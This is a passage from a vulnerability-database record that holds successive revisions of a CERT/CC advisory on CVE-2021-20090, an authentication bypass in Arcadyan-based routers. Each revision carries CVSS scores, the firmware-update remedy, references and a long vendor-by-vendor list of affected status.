<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-08-10 19:29 UTC \n**Document Revision: ** | 9 \n", "published": "2021-07-20T00:00:00", "modified": "2021-08-10T19:29:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.buffalo.jp/news/detail/20210427-03.html", "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-08-10T20:49:00", "history": [], "viewCount": 37, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-08-10T20:49:00", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-08-10T20:49:00", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-08-10T20:49:00", "differentElements": ["description", "modified"], "edition": 6}, {"bulletin": {"id": "VU:914124", "hash": "e19d2dbe668126e5140899726fe33332", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nWe have elevated information to D-Link Corporation for investigation.\n\nIf affected and we have scope we will update. \n\nThank you for the notification, William Brown security@dlink.com\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&amp;T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LANCOM Systems GmbH Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Netgear Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Zyxel Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References \n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-08-11 11:33 UTC \n**Document Revision: ** | 10 \n", "published": "2021-07-20T00:00:00", "modified": "2021-08-11T11:33:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.buffalo.jp/news/detail/20210427-03.html", "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-08-11T11:49:04", "history": [], "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}], "modified": "2021-08-11T11:49:04", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-08-11T11:49:04", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-08-11T11:49:04", "differentElements": ["description", "modified"], "edition": 7}, {"bulletin": {"id": "VU:914124", "hash": "1f44640e0b53e88b1a1e31163fe812f0", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAVM does not utilize Arcadyan components.\n\n#### References\n\n * <https://en.avm.de/security/>\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nWe have elevated information to D-Link Corporation for investigation.\n\nIf affected and we have scope we will update. \n\nThank you for the notification, William Brown security@dlink.com\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&amp;T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor 